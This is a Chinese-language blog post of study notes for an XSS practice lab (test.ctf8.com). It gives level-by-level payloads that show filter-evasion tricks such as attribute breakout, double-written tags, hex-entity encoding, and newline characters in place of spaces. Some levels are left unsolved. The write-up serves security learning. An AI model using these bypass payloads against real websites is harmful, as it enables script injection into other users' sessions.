Web安全测试学习笔记 - XSS靶场 - test.ctf8.com

1.<script>alert(1);</script>

 

2.显示文字区域过滤了<>,但是input没有过滤,payload:"><script>alert(1);</script>

 

3.显示文字区域和input都过滤了<>,payload:'onclick='javascript:alert(1)'

 

4. payload:" onclick='javascript:alert(1)'

 

5.on和script会被加上下划线,payload:"> <a href = javascript:alert(1)>

 

 

6.href,src,data这些关键字都加下划线了,payload:" Onclick='javascript:alert(1)'

 

7.双写绕过,payload:"> <scrscriptipt>alert(1)</scrscriptipt>

 

8.16进制编码,payload: &#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3B;

 

 

9.必须要有http://,利用js的注释符,payload:java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1) // http://

 

10.有个隐藏控件,但是过滤了<>,payload:&t_sort=" type="text" onclick="alert(1)

 

11.跪了,网上找的答案:

12. 和上一题一样,改User Agent

 

13.同上,用Cookie

 

14、15貌似都有问题,跳过

 

16. script和空格没法用,payload:keyword=<input%0Atype='text'%0Aonclick='alert(1)'>,或者:<input%0Dtype='text'%0Donclick='alert(1)'>

 

17-20. flash会被禁止,无法弹框

 

posted @ 2021-01-11 15:45  Sally_Zhang  阅读(808)  评论(0编辑  收藏  举报